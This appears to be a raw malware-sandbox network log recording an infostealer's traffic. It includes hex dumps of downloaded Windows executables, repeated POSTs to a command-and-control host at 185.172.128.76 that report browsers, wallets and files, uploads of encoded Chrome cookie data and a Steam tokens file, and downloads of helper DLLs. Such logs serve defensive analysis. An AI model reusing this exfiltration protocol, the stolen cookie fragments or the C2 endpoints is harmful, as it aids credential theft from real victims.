                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:13 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:28:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 
00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"browsers------FBFCGIDAKECGCBGDBAFI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.172.128.76Content-Length: 6871Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 185.172.128.76Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"------BGDAKEHIIDGDAAKECBFB--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file"------IDHDGIEHJJJJEBGDAFHJ--
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="message"wallets------BFHDHJKKJDHJJJJKEGHI--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"files------DAECAECFCAAEBFHIEHDG--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKKKJJJKJKFHJJJJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCGHIJKEGIECBFCBAEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFIDAECBGCBFHJEBGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.172.128.76Content-Length: 127543Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"1818166------BKECAEBGHDAEBFHIEGHI--
                            Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                            Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                            Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
                            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                            Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
